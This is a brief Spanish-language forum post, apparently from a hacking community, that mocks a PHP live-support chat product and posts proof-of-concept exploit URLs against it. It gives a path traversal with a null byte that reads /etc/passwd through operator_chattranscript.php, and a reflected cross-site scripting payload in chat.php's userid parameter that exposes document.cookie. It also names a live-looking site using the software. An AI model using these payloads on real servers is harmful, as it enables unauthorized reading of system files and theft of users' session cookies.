Ajax Chat
los maldito "encriptan" su codigo fuente de PHP xD, que lol jajajajhttp://www.pcdiscs.co.uk/chat/
Remote File Disclosure
Código:
PoC:
http://www.server.com/includes/operator_chattranscript.php?chatid=../../../../../../etc/passwd%00
http://www.server.com/includes/operator_chattranscript.php?chatid=../../../../../../etc/passwd%00
XSS
Código:
PoC:
http://www.server.com/visitor/livesupport/chat.php?userid=<script>alert(document.cookie)</script>
http://www.server.com/visitor/livesupport/chat.php?userid=<script>alert(document.cookie)</script>
Saludos!!










Autor




En línea
